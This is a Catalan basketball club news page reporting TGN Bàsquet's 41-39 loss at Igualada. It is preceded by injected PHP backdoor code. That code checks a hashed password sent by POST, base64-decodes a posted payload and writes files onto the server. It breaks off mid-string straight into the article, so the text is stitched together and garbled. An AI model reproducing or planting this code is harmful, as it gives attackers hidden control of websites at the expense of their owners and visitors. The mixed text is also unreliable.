function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet perd a la pista de l'Igualada en un partit marcat pel desencert ofensiu dels dos equips (41-39) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet perd a la pista de l’Igualada en un partit marcat pel desencert ofensiu dels dos equips (41-39)

Updated: gener 25, 2015

En un partit realment estrany per la poca anotació dels dos equips, el Nemser TGN Bàsquet va tornar de buit en el seu desplaçament a Igualada. El conjunt que entrena Jordi Hernández va tornar a perdre lluny del pavelló del Sagrat Cor en una temporada en què només ha pogut vèncer a la pista del Nou Bàsquet Olesa.

L’equip lila va sortir amb poca tensió i de seguida es va veure’s sorprès pel seu rival que va poder arribar al final del primer quart amb 10 punts d’avantatge. Van ser minuts desastrosos en l’aspecte ofensiu pel Nemser TGN Bàsquet, perdent una infinitat de pilotes que, per tant, li impedien fer més atacs i, conseqüentment, poder anotar. La dinàmica va continuar en el segon període però, amb la gran sort que el conjunt local també va estar negat de cara al cèrcol. En un parcial realment raquític (2-4), el Nemser TGN Bàsquet va poder encarar la segona meitat amb possibilitats de victòria, un fet realment destacable si es té en compte que l’equip tarragoní només va poder anotar 9 punts en els primers 20 minuts.

Per tal de trobar solucions a la manca de punteria, als nervis i imprecisions en atac estàtic, Hernández va decidir anar a guanyar el partit des de la defensa. Pressió a tota la pista, canvi d’individual a zona, tot. Així, van arribar moltes recuperacions de pilota i el partit es va mantenir igualat.  Amb tot, el Nemser TGN Bàsquet no es podia posar per davant en el marcador i això va ser un handicap. En l’última jugada, amb 41-38 al resultat, Vilamajor va ser víctima de falta. Va anotar el primer tir lliure, el segon no va entrar, Farré va estar a punt d’agafar el rebot ofensiu però la pilota va anar a parar a mans de l’Igualada que va certificar el triomf.